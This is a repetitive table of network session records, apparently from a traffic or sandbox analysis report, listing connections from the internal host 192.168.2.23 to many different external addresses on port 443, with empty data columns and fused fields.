                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19677192.168.2.2338998140.81.43.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19678192.168.2.2355148108.200.30.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19679192.168.2.235240664.94.164.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19680192.168.2.235637498.118.165.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19681192.168.2.234784271.0.48.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19682192.168.2.2333608128.66.76.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19683192.168.2.2354946153.123.158.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19684192.168.2.234776266.130.87.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19685192.168.2.234493076.60.177.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19686192.168.2.2353326201.177.204.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19687192.168.2.2340462219.237.80.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19688192.168.2.2357274119.167.237.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19689192.168.2.2346428101.41.225.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19690192.168.2.235813019.54.20.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19691192.168.2.233950227.113.150.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19692192.168.2.234214224.135.40.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19693192.168.2.236041473.43.243.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19694192.168.2.235365837.182.95.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19695192.168.2.235118269.135.0.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19696192.168.2.2339744123.247.132.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19697192.168.2.233651437.121.239.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19698192.168.2.2360422198.157.243.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19699192.168.2.2336686161.112.27.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19700192.168.2.2338390197.86.179.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19701192.168.2.2358378141.46.152.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19702192.168.2.2352766104.255.35.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19703192.168.2.2339628181.61.237.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19704192.168.2.2342464146.51.242.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19705192.168.2.235680675.197.123.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19706192.168.2.233660831.110.111.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19707192.168.2.234567692.159.164.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19708192.168.2.2359714176.127.37.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19709192.168.2.2354004109.23.186.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19710192.168.2.234654227.182.169.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19711192.168.2.2355546190.190.65.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19712192.168.2.2352580216.126.110.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19713192.168.2.2343308211.250.243.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19714192.168.2.2356010202.6.106.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19715192.168.2.235290859.196.189.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19716192.168.2.233673245.12.35.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19717192.168.2.233736867.213.67.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19718192.168.2.234037418.187.178.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19719192.168.2.2355878175.90.63.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19720192.168.2.2348320197.142.18.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19721192.168.2.235751044.205.2.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19722192.168.2.2344564222.231.70.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19723192.168.2.2334248107.221.20.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19724192.168.2.2343906103.14.121.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19725192.168.2.236018696.12.45.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19726192.168.2.2339970109.13.111.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19727192.168.2.2335778135.208.43.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19728192.168.2.2335138222.39.178.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19729192.168.2.233393867.130.216.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19730192.168.2.2354184179.32.213.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19731192.168.2.235362813.9.35.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19732192.168.2.2342084111.182.208.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19733192.168.2.2360482137.191.164.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19734192.168.2.2354082164.131.137.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19735192.168.2.2342790187.95.229.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19736192.168.2.2346608192.151.20.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19737192.168.2.2352434112.30.228.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19738192.168.2.2357856222.34.52.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19739192.168.2.2351866155.49.205.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19740192.168.2.2344482187.213.142.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19741192.168.2.233486680.83.78.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19742192.168.2.2336562204.75.187.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19743192.168.2.234285876.40.84.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19744192.168.2.2359268128.7.107.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19745192.168.2.2349710183.255.142.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19746192.168.2.2340426165.8.117.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19747192.168.2.2334570147.219.226.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19748192.168.2.2345236116.166.88.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19749192.168.2.234668442.245.236.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19750192.168.2.2351818205.16.246.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19751192.168.2.2332932123.10.209.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19752192.168.2.2334364178.86.168.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19753192.168.2.2356584136.50.154.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19754192.168.2.2360470108.233.130.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19755192.168.2.2341606220.236.35.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19756192.168.2.2355660185.108.26.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19757192.168.2.2356626175.212.151.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19758192.168.2.2352826218.147.130.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19759192.168.2.235704286.72.246.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19760192.168.2.2337496175.110.129.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19761192.168.2.2356622197.200.96.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19762192.168.2.2355052183.140.51.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19763192.168.2.2349906208.29.179.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19764192.168.2.2360600202.102.16.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19765192.168.2.2336470135.75.124.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19766192.168.2.236097262.94.65.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19767192.168.2.2347886200.180.228.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19768192.168.2.233344098.30.214.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19769192.168.2.235865413.170.10.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19770192.168.2.233756283.191.208.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19771192.168.2.2334116221.150.214.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19772192.168.2.233665287.60.126.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19773192.168.2.2356268211.42.45.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19774192.168.2.234875074.145.121.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19775192.168.2.234401679.169.113.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19776192.168.2.2357676162.177.191.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19777192.168.2.2357882167.69.168.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19778192.168.2.2340070207.77.103.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19779192.168.2.2360350145.14.10.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19780192.168.2.2348076167.98.94.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19781192.168.2.2349198112.148.11.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19782192.168.2.2335108103.110.172.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19783192.168.2.234633219.183.173.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19784192.168.2.2360860139.154.199.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19785192.168.2.2352282169.14.134.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19786192.168.2.233703065.101.16.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19787192.168.2.2340050168.31.47.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19788192.168.2.235863091.160.140.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19789192.168.2.234079462.89.80.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19790192.168.2.2356450194.68.177.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19791192.168.2.234987473.137.135.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19792192.168.2.2341618207.15.41.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19793192.168.2.2335130158.24.177.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19794192.168.2.2349456201.144.66.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19795192.168.2.234556442.164.254.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19796192.168.2.2355466155.204.50.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19797192.168.2.233746269.231.178.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19798192.168.2.233842853.218.120.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19799192.168.2.2352872159.57.244.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19800192.168.2.2356476184.164.255.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19801192.168.2.235859285.108.121.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19802192.168.2.235621844.64.14.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19803192.168.2.234145841.116.2.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19804192.168.2.2354934177.243.156.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19805192.168.2.234914224.221.152.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19806192.168.2.234422675.182.179.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19807192.168.2.2352988170.200.136.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19808192.168.2.235767268.62.144.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19809192.168.2.2350014207.192.245.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19810192.168.2.235637259.76.71.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19811192.168.2.2349900109.233.27.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19812192.168.2.2353714206.80.15.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19813192.168.2.2341504156.66.71.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19814192.168.2.233807277.1.246.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19815192.168.2.234416681.205.130.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19816192.168.2.233589268.205.33.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19817192.168.2.2359622195.197.142.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19818192.168.2.235942458.42.183.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19819192.168.2.234140046.198.67.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19820192.168.2.235521248.189.4.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19821192.168.2.2359914142.204.72.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19822192.168.2.2353320138.2.254.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19823192.168.2.2351476117.225.102.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19824192.168.2.235147813.141.149.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19825192.168.2.2344878175.240.87.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19826192.168.2.2345706176.151.149.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19827192.168.2.2341914158.180.247.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19828192.168.2.235423291.238.157.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19829192.168.2.2341824223.88.33.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19830192.168.2.2355722118.126.176.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19831192.168.2.2350054182.58.219.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19832192.168.2.2334744168.8.251.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19833192.168.2.2352686123.38.42.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19834192.168.2.234376287.119.159.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19835192.168.2.2360380138.0.156.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19836192.168.2.2352354131.182.155.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19837192.168.2.2355252139.115.144.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19838192.168.2.2359478223.103.108.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19839192.168.2.2353916137.108.68.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19840192.168.2.2334162133.84.202.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19841192.168.2.2353444128.109.197.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19842192.168.2.233375844.59.63.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19843192.168.2.2333530223.11.127.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19844192.168.2.2353636112.177.106.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19845192.168.2.2335732144.108.100.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19846192.168.2.235321476.25.14.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19847192.168.2.233374476.212.140.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19848192.168.2.234305651.1.90.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19849192.168.2.2352938149.222.178.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19850192.168.2.2341522223.184.198.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19851192.168.2.23534249.74.182.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19852192.168.2.2357006169.98.151.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19853192.168.2.2333340217.5.210.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19854192.168.2.2347986101.231.32.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19855192.168.2.235158641.178.18.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19856192.168.2.2355464134.175.220.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19857192.168.2.2336710180.159.31.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19858192.168.2.2344220207.88.74.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19859192.168.2.2350422149.251.209.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19860192.168.2.235123245.120.210.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19861192.168.2.234268444.192.33.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19862192.168.2.23488364.119.230.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19863192.168.2.2338874178.63.187.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19864192.168.2.23490605.152.106.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19865192.168.2.2351660124.172.193.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19866192.168.2.2342864123.162.34.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19867192.168.2.235455048.188.245.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19868192.168.2.2356890157.90.137.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19869192.168.2.2343810184.5.100.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19870192.168.2.2349352204.67.94.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19871192.168.2.2346690184.33.108.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19872192.168.2.234368437.58.103.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19873192.168.2.2345566170.79.161.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19874192.168.2.23497388.24.61.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19875192.168.2.234134849.181.50.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19876192.168.2.233343488.131.120.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19877192.168.2.2345390213.62.0.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19878192.168.2.2348470101.168.253.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19879192.168.2.2354782100.197.70.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19880192.168.2.2356586107.142.243.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19881192.168.2.233598689.67.0.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19882192.168.2.233973662.89.112.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19883192.168.2.2345280207.108.4.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19884192.168.2.2340136198.1.221.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19885192.168.2.235428688.53.234.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19886192.168.2.2356956175.88.146.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19887192.168.2.2355622125.172.103.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19888192.168.2.2343372194.244.216.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19889192.168.2.235644241.65.171.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19890192.168.2.235268814.94.47.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19891192.168.2.2340570161.60.142.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19892192.168.2.233376874.182.252.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19893192.168.2.234320499.60.41.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19894192.168.2.2357130208.44.208.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19895192.168.2.2358772211.41.154.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19896192.168.2.234667438.212.124.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19897192.168.2.23377905.90.123.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19898192.168.2.235691034.32.94.69443
